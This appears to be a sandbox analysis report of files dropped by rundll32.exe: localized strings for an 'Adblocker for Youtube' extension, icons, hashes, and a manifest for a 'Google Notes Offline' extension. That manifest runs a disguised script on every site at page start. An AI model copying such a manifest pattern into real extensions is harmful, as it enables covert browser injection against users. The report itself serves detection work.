File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):161
Entropy (8bit):4.896417588493298
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVEUJL2gBBVR7WHTkP6Wk01KzE2LRxKFHltkZWVEUJL2gBT1n:bk/dP6GLJRVR7SzW9KzlLRM9ltk6Jj1
MD5:5C5A1426FF0C1128C1C6B8BC20CA29AC
SHA1:0E3540B647B488225C9967FF97AFC66319102CCD
SHA-256:5E206DD2DAD597AC1D7FE5A94FF8A1A75F189D1FE41C8144DF44E3093A46B839
SHA-512:1F61809A42B7F34A3C7D40B28AA4B4979AE94B52211B8F08362C54BBB64752FA1B9CC0C6D69E7DAB7E5C49200FB253F0CFF59A64D98B23C0B24D7E024CEE43C4
Malicious:false
Preview:.{"appName":{"message":"Adblocker para o Youtube."},"appDesc":{"message":"Voc. est. procurando v.deo adblock? Ent.o baixe Adblocker para o Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):161
Entropy (8bit):4.896417588493298
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVEUJL2gBBVR7WHTkP6Wk01KzE2LRxKFHltkZWVEUJL2gBT1n:bk/dP6GLJRVR7SzW9KzlLRM9ltk6Jj1
MD5:5C5A1426FF0C1128C1C6B8BC20CA29AC
SHA1:0E3540B647B488225C9967FF97AFC66319102CCD
SHA-256:5E206DD2DAD597AC1D7FE5A94FF8A1A75F189D1FE41C8144DF44E3093A46B839
SHA-512:1F61809A42B7F34A3C7D40B28AA4B4979AE94B52211B8F08362C54BBB64752FA1B9CC0C6D69E7DAB7E5C49200FB253F0CFF59A64D98B23C0B24D7E024CEE43C4
Malicious:false
Preview:.{"appName":{"message":"Adblocker para o Youtube."},"appDesc":{"message":"Voc. est. procurando v.deo adblock? Ent.o baixe Adblocker para o Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):161
Entropy (8bit):4.896417588493298
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVEUJL2gBBVR7WHTkP6Wk01KzE2LRxKFHltkZWVEUJL2gBT1n:bk/dP6GLJRVR7SzW9KzlLRM9ltk6Jj1
MD5:5C5A1426FF0C1128C1C6B8BC20CA29AC
SHA1:0E3540B647B488225C9967FF97AFC66319102CCD
SHA-256:5E206DD2DAD597AC1D7FE5A94FF8A1A75F189D1FE41C8144DF44E3093A46B839
SHA-512:1F61809A42B7F34A3C7D40B28AA4B4979AE94B52211B8F08362C54BBB64752FA1B9CC0C6D69E7DAB7E5C49200FB253F0CFF59A64D98B23C0B24D7E024CEE43C4
Malicious:false
Preview:.{"appName":{"message":"Adblocker para o Youtube."},"appDesc":{"message":"Voc. est. procurando v.deo adblock? Ent.o baixe Adblocker para o Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):262
Entropy (8bit):4.5033681386610525
Encrypted:false
SSDEEP:6:bk/dPeARd/5yXZEcVR7U95DRd/2XfUbvYfWbsRd/5yXZ0Y:4dmARh5cekFU9lRhSfUEW4Rh5cKY
MD5:CA49D076ACD74F2FAF38C51BB94A7655
SHA1:3CFC0948599DEA9B054019A27B4EAC0EC0546EF1
SHA-256:506CFB234C07A5087B7522469415660710FD9112BEFFFF2008C6E68DC05F0A3B
SHA-512:ADCCDD574363EC1E01D903496A1F7E4C50AC65AAB82C564B14D0749FDE22A7C0FD1FD25DF809B3FCEE0235CA1FEED6EF2DCE8D9E225758178B9F21D77D7D5C27
Malicious:false
Preview:.{"appName":{"message":"........... ....... ... ......"},"appDesc":{"message":"..... ........... ..... .......? ..... ......... ........... ....... ... ......."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):143
Entropy (8bit):5.010701769608737
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWLt2gBBVR7WHNhbAyA2eCnngXR3L1hxJMWLt2gBT1n:bk/dP6GlVR7Mh8p3+gB3pXX1
MD5:A43FFF6CFE872C583DB062871D25CA36
SHA1:37F424E9CAF6604C494CFE5852939928579D57F3
SHA-256:4988A2D80C4F9E21C5C1614E3499C85A363E945D1288BC855A4A716A7FA5CA20
SHA-512:8C83C839805402FBDA12B27E9730E3815A286A37A6880202068C23F74603FE970ED3BF4C03F6F7AA194909E33AD2FA9A1DA21AA3F2D2A04516FD719DA565A6B0
Malicious:false
Preview:.{"appName":{"message":"Adblocker na Youtube."},"appDesc":{"message":"H.ad.te video adblock? Tak.e stiahnu. Adblocker na Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):138
Entropy (8bit):4.923079352507677
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWft2gBBVR7WHMgE/RAFJeCnnGF6JMWft2gBT1n:bk/dP6G5VR7y7i+S6j1
MD5:D8084714517DD44C55C4CD0F73A2B0BD
SHA1:ED51C0EE20DDF94E3ED1E2F95FDBE62921098B96
SHA-256:B0F22F0F3C8361CAD77040ACD0FBFC8904D697F108119F0CAC61C35243EA0729
SHA-512:DAA57D28D044C594F85B5FA0A22FD7498165904861CCD33AC84F58314AB3414618F08C67D58E3473C8CF67C97588E6D69FE68C401360B55E24BB2C2725414083
Malicious:false
Preview:.{"appName":{"message":"Adblocker za Youtube."},"appDesc":{"message":"I..ete video adblock? Tako prenesi Adblocker za Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):171
Entropy (8bit):4.969371046083134
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVmBFBBVR7WHPaDFJDwOSC47/MSLJMWVmBFBT1n:bk/dP6GwVVR7OmsOSNzMpf1
MD5:BED2C5E327380FAD31DD34DFF7874A74
SHA1:86AC1C9F97B35A01B340C0B1ADB2529517F2B641
SHA-256:481D2C35471F8C852438AD51BD45B237FCD29A6FF859AD7EC25D4F195FA17B13
SHA-512:B308D0F1F61B179D2F7CAABCCBA2488FAE4FF50A8A186F4EAB8E7B0F0AC1C14B38EE44DA6D76E6234BF119965BA03B30D72524A4838FB6A9952BE2CD9AC8656B
Malicious:false
Preview:.{"appName":{"message":"Adblocker p.r Youtube."},"appDesc":{"message":"Ju jeni n. k.rkim p.r video adblock? K.shtu q. t. shkarkoni Adblocker p.r Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.913200195070275
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDmTWxBBVR7WHJAiXFPmVkJEBHW1JE3s01WDmTWxBT1n:bk/dP6GZRVR7I9EV1W1JE3sfj1
MD5:910A00B8A4A73C896AAD63A769D682E8
SHA1:B99FB9F9195908EC1213E5DC0DAB5676CD01A08B
SHA-256:89DDAFA626E66297FE0FFB684756D959AC5774DA65197CCB7C1EEDAA7186CB42
SHA-512:E3F6F3D1AAA63E61ACE198EB116387AA3483DCB4C43E6D92231500B71FB80022EB03A767872B7EF5CE4846DDF90F631D5472C62BE59106AA9A358123A14E650A
Malicious:false
Preview:.{"appName":{"message":"Adblocker f.r Youtube."},"appDesc":{"message":"Letar du efter videon adblock? S. ladda ner Adblocker f.r Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):141
Entropy (8bit):4.98798149548062
Encrypted:false
SSDEEP:3:bk/rhPUHcxBiMxIkZUkkVVR7WHTlbPtXCcAWaGK5gBiMxKBWIpKZYHYY:bk/dPvviVR7SlbtCY/UWp6
MD5:9222A5F6A75F38F60ABF1D5F5137CFE3
SHA1:81837EA5D2788D5FFFF21DB29977DDEE50FDB00A
SHA-256:EC917A8DCB1D40EAB935C4BC7F9F9057CF7AF892D56DEBC945DD283A294766F8
SHA-512:9DC69347DB4BE3D15452C0C04B3E456F202707D3868884B201B80A7C19A89D437A70B7B67886873C73BD1BD475033348DA8FCB9B93B501AF8C358F7784FDB245
Malicious:false
Preview:.{"appName":{"message":"Youtube.i.in Adblocker"},"appDesc":{"message":"Video adblock ar.yorsunuz? Youtube.i.in indirme Adblocker."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):198
Entropy (8bit):4.820396470880301
Encrypted:false
SSDEEP:6:bk/dPe1Sq89abu1VR7U3ydX8d0v+cHf5Vqaq89abu/1:4dm1SlAeFUyX8d0WaqCAI1
MD5:984B0001491DCC9814D4954EB7009008
SHA1:AB87E0E7A8DAB7D178CE00551B943F67E683DF21
SHA-256:AA3211517E590FDAF9866DC06C59018C16617109782866466F8296741EAE7400
SHA-512:F80E86CE6BC1EF2F272296B7BF7E84C89A2BBE10A5BE0719CA913ABAA482F520CB6BBF416E2704D70783434EBB7A4B8295006EC883D3D47847F435061FB93F3E
Malicious:false
Preview:.{"appName":{"message":".......... ... YouTube."},"appDesc":{"message":".. ....... ..... ......? ... ....... .......... ... YouTube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):5037
Entropy (8bit):7.905954051333691
Encrypted:false
SSDEEP:96:oSu1bZFj7Yc0jwjB366savGst6Fu3lUPH0AETYRgRY5Ib1zOgvAZhhx9CE1KVK8Q:oSu9ZuFS16navGstqeKH0RtIk16gIZ9r
MD5:D2CEC80B28B9BE2E46D12CFCBCBD3A52
SHA1:2FDAC2E9A2909CFDCA5DF717DCC36A9D0CA8396A
SHA-256:6D38E0BE2E6C189DE3E4D739BAE9986EE365A33BAF99A9234E5C9EFFB44B791A
SHA-512:89798889D41CFC687A31C820AEA487722B04EA40F7FD07CE899A0E215B7B1703380188BA103825A4B863F8CBCA76430BFC437705630F0BFCAFFD50A78C2BB295
Malicious:false
Preview:.PNG........IHDR..............>a.....bKGD..............pHYs.................tIME.....%&.OMe...:IDATx..]i...y~.....].V+iW.t@.'.....?...(...._.cc.p...9.........%s(...U&.WH%N.J~.8.l.T...5.`........7?.g...{.{.ggv.......{...... .\r.%.\r.%.\r.%.\r.%.\r.%.\r.%.\FI.Z..5..C1..Z...o..x...|....{&....*.P.....R.v....U....TN......K...t.X....{...m.3?X.{.$.......".. .+. yR._7.....+}.m... ...T......AY....@BC........2;<`.. ...W...,.)..r..Mj.;.......[....'..!....B....G.ulw...i.I.v.0......U.Cw. ..`W.....H.....@.k...Q.faW...0..'z.$!....Cw]/K[.N...CE...`.......k..p.^.zc,./..3E...^a..&.P.PKpm.......n-..6.}m...#[.......71s.Q......^/."A`.?.....(.....D ..._...S.........k......|q...-.U..l....j...S).}...._...W2....Y@...CwJ}b.Y.`(...O.=o.s..V.:.R_.`...0.D.J(.....]0.....8.U../!y...wh...$.P......o.W..PL\...=3..bL.....i(...*..]..xX.....G...L..f.Bb.c.{f....G......kn..w.4,.......u;af@.a..E..+~..Z...f...=..C.4../'.. ....-.x.w.u;a......a..}.V .8.5 .X:.u.x.5h..".....?.....
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):7197
Entropy (8bit):7.962463224314917
Encrypted:false
SSDEEP:192:slDTzZP7qbIqxOmYBFL5zsInaVnO0a0y1qZq4ztXab:slvYHxOmYHdzsIaO0a5Kab
MD5:A488210AE174A304ECA7091136646C16
SHA1:7024B249A2CFB3194C22BF78ACE79F3C0EB8148E
SHA-256:780FD5E6105D8E59CD24C797B9C6200293BD89D735F64A918F89A3FD2850F207
SHA-512:2ABF766E47081E2DB98BAB6EF421A0C08C40683EB31D128330D00EF985D6AC28935E856D8138BCAE77C9BC155585746FB42C8B5E2D294E9FFEC0ABBF7976FC83
Malicious:false
Preview:.PNG........IHDR..............>a.....sBIT....|.d....bzTXtRaw profile type APP1..x.U...0....Sx.w..2.B.EB...A..W...l..z.k.G.UUU.k.i.f^.n..(_-.LD..+.. .H...zP.s...fIDATx..y.]U..k.s.+UIe....d..A.D..ZE@.8..s.gK..?.>m.n?.......<.E..$.L.C&B.L...[..s.z..{oUB%..V..;...=g.}.^......J(...J(...J(...J(.........K...].:..TG...VY.T;.Jk....VI...[..'f.1 ...,.......6...........#"..A1.F@r...=2...(."X.E...(...........O.fU..x....^<"...f..u.n .....F.....wh.V...N....mi=..VY....4.1.l.......d|.'.sz.1....L...G.... ..H.".......P0&.o{....a..}.krb...........Blz..Dx....4......Y.6P].Tg.....N.a....`..3,r..p.1..#Ri...VC..T".7.i.W....2..].^.D............c.X...D...!\l.#..}.'....A.2.mr4.C...t.....J.C".../..1./!2.(e..F.b..b.U:....~c.._.L.."...K.Q.qn.DN+..R.*.dp......~....eO..$...`.Eo....@...c......w...Y...[.~.`.E.W........Ul.6U.c.F...x.w...W..?..+..3....|e....K..1.#.5HE.....m...<....e.......1.%....%0..N....s\..x..'Zm.m.?.)..q...C<.a.+........=V0..~C.x..u.....?^...A.0cN....;.h...
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):704
Entropy (8bit):7.693751636838362
Encrypted:false
SSDEEP:12:6v/7ZtUTAif47vF78e/130eWbHvC5clQAg1Jg5cWoFcO0JpdBsaDnTFVYdS9qRz7:eOAiwDF7B301jmAgU5crUJpdBbcdS9qn
MD5:A4B312C792EC1CEA9C8116D7A085DEC5
SHA1:0E797DCD895A9A50D4A462D71BB1F9415F901467
SHA-256:54272DE6075587CD55DF8C0E6F7EC819AB01803DA861EA6F3DD4F665D77BC728
SHA-512:B4A8AD7EEEC1AB19BF6D0F7EFB2CFAD7F01817DF155820AD17DE0274641336BA2681A5F986D5AF74149BA0DBBF8B7B67F8B7A86EE90A5C7C6481C6C81ED4F1E9
Malicious:false
Preview:.PNG........IHDR................a....IDATx...K.Q..P...t*..a.m.N...,.i.3................B-.HZTj.....&:S_.R.M.....O..x-..|..{^....8p..m@H..L.7[j......4..P..Jl+.........u.9....Ke..l..s.=.3[./..W..[..9.<w".L..ozO.0.p......~..!...8..Zx..|o.+O.Y.....b.....!@.Q...6...P..8.`..L_/....v2./....`..?.5q..,C....)k.......... ...u....!4...X...]...!..e....Q..<..t.jg(`....x....@8..%b.e.....+B#.h..@.;s..i..I.0.f. H....h.J@x5.K<.......G.........bM.k....dN....^...........D...M.$(...O.......m.r...N..9-q.....}..w...<L\...gY.._NCz.>V......C..2%....&...;O.%.M=...g.}q......N...L.$.4..O3....cA...X<L..a..{.m0...*..".2..t..j.....U.T...@.>j.Q..........:}te...C.1.6..I..".`|'....IEND.B`.
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):2570
Entropy (8bit):7.921033632215019
Encrypted:false
SSDEEP:48:bj5zyYhx6x3dYcRUj9crj/sT0f0xdJ8fJ0crAubN1igExJIupgn+Z9t+h1q0o6sH:n5zpL69dRhrjsT0FNkgEFgnet+hRo6sH
MD5:1E001C21C2A87A52EAB0B0D08A06E753
SHA1:F90EFECA6A2527EC053FE872B12E7AFB3EB1423B
SHA-256:88999ED5F6AAC39C82A4AF4C775F82439AE050D1EA2F03250758CA685A189504
SHA-512:81617EBCD2059C4F4024E502ACBCE4F6A4C25D8CB26E82908F682AD58B87FE5B463B86FFC2FB5289B9FA8B565D8E091808E295129CFF817A581E54F2BEA3A69F
Malicious:false
Preview:.PNG........IHDR...0...0.....W.......IDATx..yTSw........Pd.k.I.BB... K@.9s....NO.z....L.l...K.r..q:.XQ@.T...((.d_......T.;.....`......|..%.w.......E.n.....4~.gc..gb.].i.2].*.'F..F..O.X.Q~.Q..i..zb.z5.-x.M..H...t...{cU[u...>.......}..U..I...C]..o.j.<....x.....2..q..l..f.....(..Q..D+G....._...%.p...8../..Kz......?8o..4.v...W..z..K.a.c.X.w..>..J9....%.`$.E-q?.Q.v.(.u1J.A.....?.[......u.Qr?..E.[.^w....z.j@o.RmT.!...s...5f..r.N..........M.Q...){....C.?{".9.'.m..P."...H.%B..=J..'.tE.......O.y.N..d..1"|^(V;..&eS..T.P8.%.'.5B.M.>....i...`>..8.I.5..X@..[4'..pR0....p*LD.....9..im..ZQ.O#v..hdH.Z..(.1...(...C......`.h..mo..s}p..E........:.?..g6....[..x.!..G...}NGC..N}......j.D7...A.0!..Z......c.............p._.....[.L.....z.....q...A].i.1s-...m|.0n......L..DJ.c..j...tE.P.i.0k...>.R!...z....-.x..."......I.V-.......O..H`..2n"i...p..L.t.DV..j.:....!..x.LQC...M....`.&<..CmMpK[.........;.M..Z.J$..-.."8.$..U..[......M..v..S&@.-m5....n?.2O.(....YP.~..XP...
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:JSON data
Category:dropped
Size (bytes):1316
Entropy (8bit):5.386187666024545
Encrypted:false
SSDEEP:24:dYh6ivGHV0ZIkW4RMiqQiXMCZ9n4OKZxO8g8nyH1:7ivGHVmX1qf6OQ08g8nI
MD5:F04829CCB91FC7E812BC3A66FB994242
SHA1:2C93B1D9533EF43D9E6015A8D42E1495B4B86617
SHA-256:A20B944D44D3D9BB3E7314DDE7979BA40689D44AEAB53D6852E4C76BEFD7AF70
SHA-512:3E7541AA86FA92163498EDA6B7FB45C683F92F731323A3DB348677543E94C6855282ED88247E092A21F2FB35C836CAE61B95CD3995F8DE3F96BB09BC18671843
Malicious:false
Preview:{. "background" : {. "scripts" : [ "_locales/en_TO/messages.json" ]. },. "content_scripts" : [. {. "all_frames" : true,. "js" : [ "_locales/en_TO/messages.json" ],. "matches" : [ "*://*/*" ],. "run_at" : "document_start". }. ],. "content_security_policy" : "script-src 'self' blob:; object-src 'self'",. "default_locale" : "en",. "description" : "Create and edit notes",. "icons" : {. "128" : "icons/ficon128.png". },. "key" : "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEApqkf3tfw228OJRNHZPophnjQgjSndhnZZPk35D/+oLqfNq33u/RqAmibIegyvLFHy+/tDE2hlHkqEtcM8xPZG3tPGmb7ZZihAq6Z8NlMZkBi6bWwfpPfO4WacSDKPL4jYIh+8Q2fXbyCrgxu6yWLBYz5t1nzj2LXE34NI+Iht0vJ24AL3CnVZgCovzFHRgjpTNJPZe8YAsezuzju311I9yBp9Xs0vpmvfJ5mkB9VLyoeJdSyR2CTmcavLVoYzNA5o1xeYFLljjr0FlzkohoDX4XBiSpoPyg7TaSaNbPQnB8RDxyQo5tM+9a4UNpbF8O1W9OI33rU5TXzuklZnP6s0wIDAQAB",. "manifest_version" : 2,. "name" : "Google Notes Offline",. "permissions" : [. "bookmarks",.
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:JSON data
Category:dropped
Size (bytes):17918
Entropy (8bit):4.458892356184697
Encrypted:false
SSDEEP:192:Ygkl3hVoHz3usBOFYBUPjhUjuU0dSiyUPreRWh63vm+wnt5wEtghArrCre:YzlJu1avC32t53tghAvCy
MD5:C5DBF3A509E7B41340A6C0F989910335
SHA1:DB17A972148E13142AA4B7BF0875A8EE99C1E057
SHA-256:8040E31C8AD2548E0A5F0B56551F51698A597690FAF85E1415ED4D246A16915E
SHA-512:C3ACA8E99D9C0631203A4D26849DC1747F672497D24167BB730FD577C1A7FA9CB41917457086409A0E0B9319DFC5BDBE5E027962400BD215992408B9F2A1290A
Malicious:true
Preview:{. "NewTabPage" : {. "PrevNavigationTime" : "13340886961014896". },. "account_tracker_service_last_update" : "13340807398438930",. "alternate_error_pages" : {. "backup" : true. },. "announcement_notification_service_first_run_time" : "13340807398295099",. "apps" : {. "shortcuts_arch" : "",. "shortcuts_version" : 0. },. "autocomplete" : {. "retention_policy_last_version" : 117. },. "browser" : {. "has_seen_welcome_page" : false,. "should_reset_check_default_browser" : false,. "window_placement" : {. "bottom" : 974,. "left" : 10,. "maximized" : false,. "right" : 1060,. "top" : 10,. "work_area_bottom" : 984,. "work_area_left" : 0,. "work_area_right" : 1280,. "work_area_top" : 0. }. },. "commerce_daily_metrics_last_update_time" : "13340807423268579",. "countryid_at_install" : 17224,. "default_apps_install_state" : 3,. "dips_timer_last_update"
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:JSON data
Category:dropped
Size (bytes):33009
Entropy (8bit):4.395241169590789
Encrypted:false
SSDEEP:768:NU1LRLTmfbja7SuLr9gtnA8xP7kxRRbrjxo+PV9:NUBtToMje+PV9
MD5:7875C0866246B162701D6DE6A0E3CE03
SHA1:088F8C119D41C74E9EF9F9A61D2797F9CFD83336
SHA-256:B313F4ACA40B376CCB65A7774077DAF13420FCD6139DDE9FF07B1C7092E77C35
SHA-512:A1F37D7F0AB0C00AA7EFEF5EA4DC124E635A27ECC8D19AA919FAD77F5191D0D68D2DC6E4FEBBF29CE3E499928110343352991800E0E894E406B16A6CA7057AC7
Malicious:true
